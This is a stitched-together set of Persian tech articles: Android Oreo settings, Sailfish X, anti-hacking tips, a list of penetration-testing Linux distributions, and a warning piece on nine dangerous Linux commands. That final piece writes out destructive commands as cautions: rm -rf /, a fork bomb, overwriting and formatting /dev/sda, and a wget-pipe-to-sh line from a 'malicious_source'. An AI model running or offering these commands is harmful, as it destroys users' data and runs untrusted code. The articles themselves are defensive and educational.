-    در پایان، یک استراتژی SysSecOps ادغام شده باید درون سازمان ایجاد شده و هماهنگ شود- در بین همه ی بخش ها  مانند مدیریت سیستم و امنیت- و از بالاترین سطوح سازمان نشات بگیرد. شفافیت SysSecOps هماهنگ شده ارزش و کارایی خود را در کمک به سازمانها برای ارزیابی، تحلیل و پیشگیری تهدید های جدی برای سیستم های IT  و نقاط پایان به اثبات رسانده است. اگر این اهداف دنبال شوند امنیت و مدیریت ریسک برای یک سیستم IT بطور چشمگیری قابل کاهش است.

اندروید اوریو می‌تواند فعالیت پس‌ زمینه‌ اپلیکیشن‌ها را محدود کند

اندروید ۸.۰، توجه ویژه‌ای به مصرف باتری دستگاه دارد. یکی از امکانات جدید اندروید اوریو، «محدودیت فعالیت پس‌زمینه»(Background Execution Limit) نام دارد. با فعال کردن این قابلیت، سیستم‌عامل محدودیت‌های جدیدی برای فعالیت پس‌زمینه‌ی اپلیکیشن‌ها اعمال می‌کند. به‌صورت پیش‌فرض، این قانون برای اپلیکیشن‌هایی که برای اندروید ۸.۰ طراحی شده باشد، فعال است؛ ولی می‌توانید در صورت نیاز، آن را برای اپلیکیشن‌های قدیمی‌تر هم فعال کنید.

برای فعال کردن این قابلیت، کافی است که از تنظیمات دستگاه، وارد فهرست اپلیکیشن‌ها شوید و در صفحه‌ی اپلیکیشن مورد نظر، گزینه‌ی Battery usage را انتخاب کنید؛ سپس گزینه‌ی «فعالیت پس‌زمینه» (Background activity) را روشن کنید. لازم به ذکر است که این قابلیت، برخلاف نامش، فعالیت پس‌زمینه‌ی اپلیکیشن را به‌طور کامل متوقف نمی‌کند؛ بلکه فقط دسترسی آن را به منابع دستگاه محدود می‌سازد.

اندروید 8.0

تنظیمات فعالیت پس‌زمینه برای اپلیکیشن‌های قدیمی (چپ) و اپلیکیشن‌های اندروید ۸ (راست)

همان‌طور که در بالا گفتیم، این قابلیت به‌طور پیش‌فرض برای تمام اپلیکیشن‌هایی که برای اندروید اوریو طراحی شده باشند، فعال است و نمی‌توان آن را خاموش کرد. در نظر داشته باشید که اگر این قابلیت را برای اپلیکیشن‌های قدیمی فعال کنید، ممکن است قسمت‌هایی از آن‌ها مثل اعلان‌ها، از کار بیفتد؛ بنابراین تنها در شرایطی که نیاز به شارژدهی بیشتر داشته باشید، از آن استفاده کنید.

سیستم‌ عامل Sailfish‌ رسما برای اکسپریا ایکس ارائه شد

سیستم‌عامل Sailfish در صنعت گوشی‌های هوشمند به موفقیت چندانی دست نیافت. پس از چند همکاری ناموفق با اینتکس، فیرفون و تی‌آرآی، شرکت فنلاندی توسعه‌دهنده‌ی این سیستم‌عامل، اکنون راهکاری متفاوت در پیش گرفته است.

ظاهرا سونی به جولا، شرکت توسعه‌دهنده‌ی سیستم‌عامل Sailfish‌، اجازه داده است که این پلتفرم را برای گوشی‌های هوشمند اکسپریا ایکس بهینه‌سازی کند. روز گذشته جولا اعلام کرد که نسخه‌ی جدید سیستم‌عامل خود موسوم به Sailfish X را برای اکسپریا ایکس آماده کرده است و این سیستم‌عامل به‌زودی برای خریداری در دسترس خواهد بود.

جولا قصد فروش سیستم‌عامل Sailfish X را به آن دسته از کاربرانی دارد که می‌خواهند این سیستم‌عامل را روی اکسپریا ایکس نصب کنند. جولا، فایل ایمیج مورد نیاز برای نصب سیلفیش ایکس (شامل VAT) را ۴۹.۹۰ یورو قیمت‌گذاری کرده است و عرضه‌ی آن را از تاریخ ۱۹ مهر آغاز خواهد کرد.

با این حال جولا فروش سیستم‌عامل یادشده را از تاریخ ۵ مهر در اروپا آغاز خواهد کرد؛ البته ممکن است فنلاندی‌ها این سیستم‌عامل را در آمریکای شمالی (ایالات متحده‌ی آمریکا و کانادا) نیز عرضه کنند.

متأسفانه تمام قابلیت‌های سیلفیس ایکس در نسخه‌ی اولیه‌ی آن در دسترس نخواهد بود؛ بنابراین ممکن است کاربران اکسپریا ایکس با مشکلاتی در بلوتوث، حسگرهای جدید (بارومتر، گام‌شمار و ...)، حسگر اثر انگشت و رادیو اف‌ام مواجه شوند.

جولا در مراحل بعدی ابزاری برای نصب در اختیار خریداران سیلفیش ایکس قرار خواهد داد؛ اما در ابتدا برای نصب این سیستم‌عامل روی اکسپریا ایکس، یک کامپیوتر لینوکسی نیاز خواهد بود. در نظر داشته باشید که سیستم‌عامل سیلفیش‌ ایکس تنها با نسخه‌ی Unlocked اکسپریا ایکس (نسخه‌ی تک‌سیم) سازگار خواهد بود.

به این چهار نکته توجه کنید تا هک نشوید!

جرایم سایبری باعث به وجود آمدن یک بازار چند میلیارد دلاری شده‌اند. به‌طوری که هم به سازمان‌ها و هم به افراد عادی صدمات جبران‌ناپذیری را وارد می‌کنند. اما اگر به این چند راه‌کار ساده توجه کنید، این توانایی را پیدا خواهید کرد که از خود در برابر این حملات محافظت به عمل آورید.

کایل لیدی محقق و مهندس توسعه در Duo Security در این ارتباط گفته است: «اگر شما یک هدف باشید که البته صادقانه بگویم، شرکت‌ها هدف اصلی هستند، با اتکا به یکسری اقدامات زیربنایی هم به خود و هم به شرکت مطبوع‌تان در این زمینه کمک‌های فراوانی خواهید کرد.» Tech Insider به تازگی گفتگویی با لیدی در این ارتباط انجام داده است. گفتگویی که دو محور اصلی در آن مورد توجه قرار گرفته‌اند. هکرها چگونه به سیستم‌ها نفوذ می‌کنند و چگونه می‌توان با رعایت چند توصیه ساده این مدل حملات را متوقف کرد. در ادامه توصیه‌های ارائه شده از سوی این کارشناس امنیتی را خواهیم خواند.

گذرواژه‌های ۱۴ کارکتری

گذرواژ‌های مورد استفاده توسط کاربران حداقل باید از ۱۴ کاراکتر تشکیل شده باشد. گذرواژه‌هایی که در لغت‌نامه‌ها نتوانید آن‌ها را پیدا کنید. اگر نگاهی به ۲۵ مورد از بدترین گذرواژه‌های سال ۲۰۱۵ داشته باشیم، به کلماتی همچون ۱۲۳۴۵۶، football و Password برخورد خواهیم کرد. گذرواژه‌هایی که به آسانی توسط یک هکر ممکن است حدس زده شوند. ما در این‌جا درباره یک هکر که سعی می‌کند، گذرواژه‌های مختلفی را مورد آزمایش قرار دهد، صحبت نمی‌کنیم، بلکه صحبت از نرم‌‌افزارهایی می‌کنیم که این توانایی را دارند تا در یک دقیقه صدها یا هزاران گذرواژه را حدس بزنند. در نتیجه بهتر است از گذرواژه‌هایی استفاده کنید که بیش از اندازه عجیب باشند. لیدی در این ارتباط گفته است: «اگر من بتوانم گذرواژه شما را در یک لغت‌نامه شناسایی کنم، در نتیجه یک هکر نیز توانایی انجام چنین کاری را خواهد داشت.» لیدی توصیه می‌کند از گذرواژه‌هایی استفاده کنید که حداقل طول آن‌ها ۱۴ کاراکتر باشد. (خودش از گذرواژه‌هایی با طول ۲۴ کاراکتر استفاده می‌کند.) گذرواژه‌هایی که از ترکیب حروف بزرگ و کوچک و سمبل‌ها ساخته شده است. یک گذرواژه پیچیده چیزی شبیه به Syd#2n3l_!4pss است؛ ترکیبی که معنای واقعی نداده و سمبل‌های مورد استفاده در آن یک هکر را گیج می‌کنند. در نتیجه به عنوان یک گذرواژه ایده‌آل به شمار می‌روند. از طرفی به کارگیری یک جمله شبیه به “this password security thing words” یک گذرواژه گمراه کننده برای یک هکر به شمار می‌رود. لیدی می‌گوید: «حدس زدن این چنین گذرواژه‌هایی برای یک هکر واقعا مشکل خواهد بود. شخصی که در نظر داشته باشد چنین گذرواژه‌هایی را بشکند باید زمان و منابع مختلف زیادی را بارها و بارها مورد آزمایش قرار داده تا بتواند فرضیه خود را آزمایش کند.» اما در طرف مقابل این چنین گذرواژه‌هایی برای کاربران مشکل‌ساز هستند، به دلیل این‌که به خاطرسپاری یک گذرواژه طولانی از کاراکترهای عجیب و غریب کار مشکلی خواهد بود. به کارگیری یک مدیر گذرواژه، شما را از حفظ کردن این چنین گذرواژه‌هایی بی نیاز می‌کند. یک مدیر گذرواژه شبیه به LastPass یا ۱Password به شیوه کاملا ایمن همه گذرواژه‌هایی که توسط سرویس‌های مختلف از ایمیل گرفته تا حساب بانکی را در یک مکان ذخیره می‌کند. در نتیجه حفظ کردن گذرواژه‌های مختلف ضرورتی نخواهد داشت.

لیدی به شدت توصیه می‌کند از گذرواژه‌های متعددی برای حساب‌های مختلف استفاده کنید. یک مدیر گذرواژه به شما این توانایی را می‌دهد تا به جای ساخت یک گذرواژه عجیب از سمبل‌های مختلف از این نرم‌افزارها در زمینه تولید گذرواژه‌های قدرتمند استفاده کنید. برنامه‌های مدیریت گذرواژه این توانایی را دارند تا گذرواژ‌های عجیب و پیچیده را تولید کرده و به صورت رمزنگاری شده در یک فایل قرار دهند. در نتیجه دیگر نیازی ندارید تا آن‌ها را در مکانی یادداشت کنید.


احرازهویت دو عاملی

فعالیت بدون احرازهویت دو عاملی باعث می‌شود، حتی اگر گذرواژه شما به سرقت رفت، همچنان حساب کاربری شما ایمن باشد. لیدی در این ارتباط گفته است: «اگر از مکانیزم احرازهویت دو عاملی استفاده کنید، حتی اگر از ضعیف‌ترین گذرواژه‌ها استفاده کنید دنیا به انتها نخواهد رسید.»

احرازهویت دو عاملی به آرامی به عنوان یک استاندارد امنیتی برای گذرواژه‌ها پذیرفته خواهد شد. با احرازهویت دو عاملی یک کاربر گذرواژه خود را وارد کرده و در مرحله دوم کدی را وارد می‌کند که آن‌را از طریق یک پیام متنی دریافت کرده است. در بیشتر سناریوها، زمانی‌که هکرها یک گذرواژه را می‌شکنند و به سد دریافت کد امنیتی برخورد می‌کنند از ادامه کار منصرف می‌شوند، به دلیل این‌که در این مرحله آن‌ها باید تلفن همراه شما را برای ادامه کار خود سرقت کنند. این ویژگی در حال تبدیل شدن به یک گزینه استاندارد است. اما بسیاری از مردم این ویژگی را فعال نمی‌کنند. لیدی در این ارتباط گفته است: «بسیاری از مردم در این مرحله سهل‌انگاری می‌کنند.» شما معمولا مکانیزم احراز هویت دو عاملی را در بخش تنظیمات حساب کاربری خود پیدا می‌کنید. این ویژگی اکنون در جی‌میل، توییتر، فیس‌بوک، اسنپ‌شات و ده‌ها سرویس دیگر در دسترس کاربران قرار دارد. تنها باید اطمینان حاصل کنید که فعال است. این سرویس‌ها در بیشتر موارد از شما سؤال می‌کنند که آیا این کد باید برای اسمارت‌فون ارسال شود یا حساب ایمیلی شما.

جلوگیری از فیشینگ

نزدیک به ۹۱ درصد حملات هکری بر پایه فیشینگ ایمیل انجام می‌شود. یک ترفند خاص و ظریف که برای هدف قرار دادن یک کاربر خاص طراحی می‌شوند. به‌طوری که او را مجبور می‌سازند روی یک لینک کلیک کرده، در ادامه گذرواژه خود را وارد کرده یا یک بدافزار را دانلود کند. این نوع ایمیل‌ها به گونه‌ای طراحی می‌شوند که واقعی به نظر می‌رسند. در نتیجه قضاوت در مورد آن‌ها در نگاه اول به سختی امکان‌پذیر است. یک کلاه‌بردار ممکن است ایمیلی برای شما ارسال کند مبنی بر این موضوع که حساب پی‌پال شما هک شده است و شما باید گذرواژه خود را به‌روزرسانی کنید. اما زمانی‌که روی لینک مربوطه کلیک می‌کنید، شما گذرواژه‌ خود را به او تقدیم خواهید کرد. در حالی که مشاهده می‌کنید، هیچ چیز تغییر پیدا نکرده است. لیدی در این ارتباط گفته است: «برای آن‌که‌ اطمینان حاصل کنید که یک صفحه معتبر و قانونی شبیه به Paypal.com و نه به یک سایت جعلی با آدرس www.paypalsecurity.xyz وارد شده‌اید باید به دقت به آدرس توجه کنید. اگر هرگونه شکی در این ارتباط پیدا کردید، ضروری است که موضوع را به دقت بررسی کنید.»

ضد مهندسی اجتماعی

همانند مشکل شماره سه، باید مراقب تماس‌های مشکوک باشید. هکرها اغلب با استفاده از مهندسی اجتماعی سعی می‌کنند شما را متقاعد سازند که قصد کمک کردن به شما را دارند. بنابراین مهم است که یک شک و تردید نسبت به تماس‌هایی داشته باشید که در آن ادعا می‌شود از نمایندگی خدمات مشتریان تماس گرفته‌اند و از شما گذرواژه‌تان را درخواست می‌کنند. تقریبا هیچ شرکتی در تماس تلفنی از شما درخواست نمی‌کند گذرواژه خود را برای او بازگو کنید. اگر چنین تماس‌‌هایی داشتید، باید مشکوک شوید.»

هکرهای واقعی از کدام سیستم‌عامل استفاده می‎کنند؟

عبارت هکر واقعی در این مقاله برای افراد با استعدادی به کار برده شده است که از نبوغ خود برای مصارف مجرمانه و خرابکاری استفاده می‎کنند. نام دیگر این افراد هکرهای کلاه سیاه است که معمولا از مهارت‎های خود بر علیه دولت‎ها، رسانه‎ها یا شرکت‎ها برای سود شخصی یا بیان اعترضات استفاده می‎کنند. این هکرها باید به دنبال سیستم‌عاملی باشند که این قابلیت را داشته باشد که هم نتوان به سادگی آنها را ردگیری کرد و در عین حال بتوان از ابزارها و امکانات مرتبط با هک گنجانده شده در آنها استفاده کرد.

هر چند در بسیاری از مطالب ارسال شده در وبلاگ‎ها و سایت‎های مرتبط با هک اعلام می‎شود که ترجیح هکرها استفاده از سیستم‌عامل لینوکس برای مقاصد خرابکارانه آنها است، اما شواهد نشان می‎دهد که همیشه هم این گونه نیست. آمار نشان می‎دهد که در خیلی از حملات پر خطر انجام گرفته توسط هکرهای واقعی، آنها برای پنهان کردن کارهای خود از سیستم‌عامل ویندوز مایکروسافت استفاده می‎کنند. اگر چه اغلب هکرها چندان علاقه‎ای به ویندوز ندارند، اما برای کار در محیط‎هایی که تنها در ویندوز اجرا می‎شوند (مثل فریم ورک دات‎نت، بدافزارهای تحت ویندوز و ویروس‎ها) مجبور هستند که از این سیستم‌عامل نیز استفاده کنند. آنها از طریق فروشندگان آن‎لاین لپ‎تاپ‎های ارزان قیمت و به اصطلاح یک بار مصرف را خریداری کرده و یک سیستم قابل بوت سبک را راه اندازی می‎کنند که نمی‎توان در آینده رد آنها را گرفت. این نوع از لپ‎تاپ‎های یک بار مصرف برای حافظه خود از USB یا کارت SD استفاده می‎کنند و با این کار به راحتی می‎توانند کارهای خود را مخفی، نابود و یا حتی در مواقع لزوم آنها را ببلعند.

بعضی از آنها نیز یک گام فراتر رفته و برای سیستم‌عامل پارتیشن‎های فقط خواندنی ایجاد می‎کنند و یک فضای ثانویه قابل نوشتن محدود را برای فضای ذخیره‌سازی کاری خود در نظر می‎گیرند. هکرهای خیلی محتاط و شکاک نیز برای جلوگیری از امکان ردیابی کارهایشان آنها را روی حافظه رم ذخیره می‎کنند تا بلافاصله قابل نابود شدن باشند.

در حالی که بعضی از هکرهای کلاه سیاه سیستم‌عامل ویندوز را ترجیح می‎دهند، خیلی از آنها از توزیع‎های لینوکس معرفی شده در ادامه استفاده می‎کنند:

۱- Kali Linux

Kali Linux یک توزیع لینوکس مبتنی بر دبیان است که برای پزشکی قانونی دیجیتال و آزمایش بررسی میزان نفوذپذیری از آن استفاده می‎شود. این سیستم‌عامل توسط شرکت Offensive Security تولید و نگهداری می‎شود. متی آهورانی و دوون کرنز در این شرکت به وسیله بازنویسی BackTrack این سیستم‌عامل را توسعه داده‎اند. Kali Linux پرکاربردترین و پیشرفته‎ترین توزیع برای سنجش میزان نفوذپذیری است. Kali ابزار خود را به‎روزرسانی کرده و برای انواع گوناگونی از پلتفرم‎ها مثل VMware و ARM قابل استفاده است.

۲- Parrot-sec forensic os

Parrot Security یک سیستم‌عامل مبتنی بر Debian GNU/Linux است که با ترکیب Frozenbox OS و Kali Linux بهترین امکان برای آزمایش امنیت و نفوذ را فراهم کرده است. این توزیع یک سیستم‌عامل برای آزمایش میزان نفوذپذیری و تعیین سطح امنیت است که توسط Frozenbox Dev Team توسعه داده شده است. این توزیع GNU/Linux بر پایه دبیان و با ترکیب Kali ساخته شده است.

۳- DEFT

Deft یک نسخه سفارشی شده از اوبونتو است که از مجموعه‎ای از برنامه‎های مرتبط با جرایم کامپیوتری و اسناد ساخته شده توسط هزاران گروه و شرکت مستقل تشکیل شده است. هر کدام از این پروژه‎ها تحت یک مجوز مخصوص به خود کار می‎کنند. این جوازهای صادر شده نشان دهنده آن است که کدام نرم‌افزار به طور پیش فرض از طریق دیسک نصب DEFT قابل نصب است.

۴- Live Hacking OS

Live Hacking OS نیز یک سیستم‌عامل مبتنی بر لینوکس با مجموعه بزرگی از ابزار هک کارآمد هم برای هک و هم آزمایش سطح نفوذپذیری سیستم است. این سیستم‌عامل از یک رابط کاربری گرافیکی GNOME استفاده می‎کند. یک نسخه دیگر از سیستم‌عامل وجود دارد که تنها از طریق خط فرمان قابل استفاده است و در نتیجه تجهیزات سخت‌افزاری خیلی کمتری نیاز دارد.

۵- Samurai Web Security Framework

Samurai Web Testing Framework یک محیط لینوکس بدون نیاز به نصب (live) است که به گونه‎ای پیکربندی شده تا به عنوان یک محیط آزمایش وب عمل کند. این CD شامل بهترین ابزار منبع باز و رایگان است که روی آزمایش و حمله به وب‎سایت‎ها متمرکز شده است. انجام آزمایشات امنیتی وب از طریق ابزار موجود به صورت مراحل چهارگانه انجام می‎شود.


۶- (Network Security Toolkit (NST

Network Security Toolkit یک CD قابل بوت بر پایه Fedora Core است. این ابزار به شکلی طراحی شده است تا امکان دسترسی به بهترین اپلیکیشن‎های امنیت شبکه منبع باز را فراهم کند. این اپلیکیشن را باید در پلتفرم‎های x86 اجرا کرد. هدف اصلی از توسعه این ابزار تامین کردن امنیت شبکه به وسیله مجموعه جامعی از ابزار امنیتی برای مدیران شبکه بوده است.

۷- NodeZero

ضرب‌المثلی هست که می‎گوید نیاز مادر اختراع است، و سیستم‌عامل لینوکس NodeZero هم از این قاعده مستثنی نیست. گروه سازنده NodeZero که از مجموعه توسعه دهندگان و آزمایش کنندگان تشکیل می‎شوند با همکاری یک دیگر مفهومی‎ به نام سیستم Live را در توزیع‎های آزمایشی لینوکس به نام خود ثبت کرده‎اند و آنها قصد ندارند با کار خود هیچ تاثیر دایمی‎ روی یک سیستم بگذارند. بنابراین تمام تغییرات اعمال شده بعد از ریبوت از بین خواهد رفت. این سیستم بیشتر مناسب آزمایشات گاه به گاه است.

۸- Pentoo

Pentoo نیز به صورت یک CD و USB زنده و برای سنجش سطح نفوذ و ارزیابی امنیتی طراحی شده است. این سیستم‌عامل مبتنی بر Gentoo Linux به هر دو شکل ۳۲ و ۶۴ بیتی نیز قابل نصب است. همچنین Pentoo را می‎توان به صورت الحاقی روی Gentoo نصب کرد. نرم‌افزار کرک GPGPU و انواع مختلفی از ابزارهای تست نفوذ و ارزیابی امنیتی از جمله قابلیت‎های این سیستم‌عامل است.

۹- GnackTrack

این سیستم‌عامل یک پروژه رایگان و منبع‌باز برای تلفیق ابزارهای آزمایش میزان نفوذ ذیری و لینوکس گنوم دسکتاپ است. GnackTrack یک توزیع لینوکس Live یا قابل نصب و مبتنی بر اوبونتو است که برای آزمایش نفوذ در نظر گرفته شده است. این توزیع با چندین ابزار مختلف از جمله Metasploit, Armitage و W3AF عرضه شده است که برای آزمایشای سطح نفوذپذیری بسیار مفید هستند.

۱۰- Blackbuntu

Blackbuntu یک توزیع لینوکس است که به طور مشخص برای آزمایش نفوذپذیری و برای تمرین دانشجویان جهت یادگیری مهارت‎های امنیتی در نظر گرفته شده است. Blackbuntu یک توزیع آزمایش میزان نفوذپذیری در محیط دسکتاپ گنوم است که نسخه آخر آن از ابونتو ۱۰٫۱۰ استفاده می‎کند.

۱۱- Knoppix STD

Knoppix STD یک توزیع لینوکس زنده مبتنی بر Knoppix است که روی ابزارهای امنیت کامپیوتر متمرکز شده است. این مجموعه شامل ابزارهایی با مجوز GPL در زمینه‎های احرازهویت، کرک کردن رمزعبور، رمزگذاری، پزشکی قانونی، فایروال‎ها، هانی پات‎ها، سیستم تشخیص نفوذ، نرم‌افزار شبکه، نفوذ، شنود، اسمبلر، ارزیابی آسیب‌پذیری و شبکه‎های بی‎سیم است. نسخه ۰٫۱ از Knoppix STD در ۲۴ ژانویه ۲۰۰۴ تحت Knoppix 3.2 منتشر شد. به همین دلیل این پروژه با رکود و فقدان درایورها و نسخه‎های به‎روزرسانی مواجه بود. هنوز مشخص نیست که نسخه ۰٫۲ آن چه زمانی منتشر می‎شود. شما می‎توانید از طریق وب‎سایت رسمی‎ آن به ابزارهای موجود دسترسی داشته باشید.

۱۲- Weakerth4n

Weakerth4n یک توزیع سنجش میزان نفوذپذیری است که از Debian Squeeze ساخته شده است. این توزیع لینوکس برای محیط دسکتاپ از Fluxbox استفاده می‎کند. از آنجا که این سیستم‌عامل شامل انواع مختلفی از ابزارهای بی‎سیم است برای هک کردن WiFi بسیار ایده‎ال خواهد بود. یک وب‎سایت خوش ساخت و یک انجمن آن‎لاین متعهد برای پشتیبانی از آن در نظر گرفته شده است. ابزارهای هک کردن وای‎فای در نظر گرفته شده برای این توزیع شامل Wifi attacks, SQL Hacking, Cisco Exploitation, Password Cracking, Web Hacking, Bluetooth, VoIP Hacking, Social Engineering, Information Gathering, Fuzzing Android Hacking, Networking و ساخت شل‌ها است.

۱۳- Cyborg Hawk

خیلی از هکرها معتقدند این پیشرفته‎ترین، قدرتمندترین و در عین حال زیباترین توزیع آزمایش نفوذپذیری است که تا به حال ساخته شده است. Cyborg Hawk به یک مجموعه حرفه‎ای از ابزار مورد نیاز برای هکرهای اخلاقی کلاه سفید و متخصصان امنیت سایبری مجهز شده است. بیش از ۷۰۰ ابزار برای این سیستم‌عامل در نظر گرفته است که شامل ابزارهای مخصوص امنیت موبایل و تحلیل‎گر بدافزار نیز می‎شود. این توزیع لینوکس یک نسخه جدید مبتنی بر لینوکس اوبونتو است.

با این بررسی مشخص می‎شود که هکرهای کلاه سیاه اغلب از لینوکس برای مقاصد خود استفاده می‎کنند، اما از آنجا که شکار آنها همیشه در محیط سیستم‌عامل ویندوز اجرا می‎شوند، باید از ویندوز نیز استفاده کنند. هر چند با انتقال اکثر شرکت‎های مالی به سرورهای لینوکسی این رویه در حال تغییر است. همچنین Mac OS X نیز هدف محبوبی برای بدافزارها و حملات هکرها نیست، چرا که نه در دسته معروف‎ترین سرور (لینوکس) قرار دارد و نه در شاخه معروف‎ترین کلاینت (ویندوز) جای می‎گیرد.

نه فرمان خطرناک لینوکس که هرگز نباید اجرا شوند!

 

لینوکس سیستم‌عامل محبوبی است. در حالی که سیستم‌عامل ویندوز این روزها از سوی بسیاری از کاربران مورد استفاده قرار می‌گیرد، اما کم نیستند کاربرانی که ترجیح می‌دهند از لینوکس استفاده کنند. لینوکس طیف گسترده‌ای از فرمان‌های مفید را در اختیار کاربران قرار می‌دهد، با این حال، تعدادی از این دستورات خطرناک هستند. به‌طور مثال، اگر نه فرمانی که در ادامه با آن‌ها آشنا خواهید شد را اجرا کنید، آسیب‌پذیری جبران‌ناپذیری به کامپیوترتان وارد خواهد شد.

اکثر فرمان‌های لینوکس مفید و کاربردی هستند، اما این دستورات موضوع مقاله ما نیستند. ما در این مقاله در مجموع نه مورد از دستورات لینوکس که باعث از کارافتادگی هر کامپیوتری می‌شوند را برای شما فهرست کرده‌ایم. دستوراتی که اجرای آن‌ها مشکلات متعددی را برای شما به همراه خواهند آورد.

۱٫ rm –rf

فرمان rm –rf / هر چیزی را حذف می‌کند، به طوری که نه فقط فایل‌های روی هارددیسک، بلکه فایل‌هایی که روی یک رسانه قابل حمل متصل به کامپیوتر وجود داشته باشد را نیز حذف می‌کند.

۲٫ () {: |: &} ;:

‌() {: |: &} ;: به نام بمب‌ فورک (Fork Bomb) نیز شناخته می‌شوند. بمب فورک نه تنها زمان پردازنده مرکزی را مورد استفاده قرار می‌دهد بلکه جدول فرآیندهای سیستم‌عامل را به طور کامل سرریز می‌کند، به‌طوری که در نهایت باعث به وجود آمدن یک حمله انکار سرویس روی یک سیستم لینوکسی شده و اینکار را تا وقتی که سیستم به طور کامل فریز شده و از دسترس خارج شود، ادامه می‌دهد.

۳٫ command > dev / sda

این فرمان داده‌های خامی را تولید کرده و تمامی فایل‌های درون یک بلوک را با داده‌های خام رونویسی می‌کند. در نتیجه حجم قابل توجهی از داده‌ها در یک بلوک از دست می‌روند.

۴٫ mv directory / dev /null

این فرمان همه اطلاعات شخصی شما را به درون یک حفره سیاه ارسال می‌کند، به این معنی که داده‌ها شما برای همیشه از دست خواهند رفت.


۵٫ wget http: // malicious_source –O | sh

خط بالا اسکریپتی را از وب دانلود کرده و آن‌را برای sh ارسال می‌کند. این‌کار باعث اجرای محتوای درون اسکریپت می‌شود. اجرای اسکرپیت‌هایی که از اینترنت دانلود می‌شوند، همیشه خطرناک است. به دلیل این‌که در اکثر موارد اسکرپیت‌ها غیر قابل اعتماد هستند. در نتیجه سعی کنید تا حد امکان از این دستور برای همیشه دوری کنید.

۶٫ mkfs.ex3 / dev / sda

این دستور را می‌توانید معادل فرمت کردن پارتیشن C در سیستم‌عامل ویندوز در نظر بگیرید. به‌طوری که دیگر هرگز به داده‌های خود دست پیدا نخواهید کرد. به این شکل سیستم شما تبدیل به یک دستگاه غیر قابل مصرف می‌شود.

۷٫ > File

این فرمان برای پاک کردن محتوای فایل‌ها مورد استفاده قرار می‌گیرد. اگر دستور بالا همراه با ترکیبی شبیه به > xt.conf اجرا شود، فایل پیکربندی یا هرگونه فایل پیکربندی سیستمی را رونویسی خواهد کرد.

۸٫ ^foo^bar

این فرمان به خطرناکی دستوراتی نیست که به آن‌ها اشاره کردیم. این فرمان به منظور ویرایش فرمانی که قبلا اجرا شده است بدون آن‌که نیازی به تایپ مجدد فرمان ضرورتی داشته باشد مورد استفاده قرار می‌گیرد. در یک وضعیت اشتباه، این دستور به شکل مفرطی باعث وارد شدن آسیب‌های جبران‌ناپذیری می‌شود. به ویژه اگر دستوری که قبلا اجرا شده است را چک نکرده باشید، ^foo^bar می‌تواند خطرناک باشد.

۹٫ Decompression Bomb

زمانی که از شما درخواست می‌شود تا یک فایل فشرده‌شده را باز کنید، محتوای فایل ممکن است به شدت فشرده شده باشد. زمانی که یک فایل را از حالت فشرده خارج می‌کنید، صدها گیگابایت داده استخراج می‌شوند که می‌توانند هارددیسک شما را پر کرده و به این شکل کارایی سیستم شما را پایین آورند. در نتیجه سعی کنید از اینکار اجتناب کنید.

اکنون که با این دستورات آشنا شدید، به خوبی می‌توانید از اجرای این دستورات ممانعت به عمل آورید.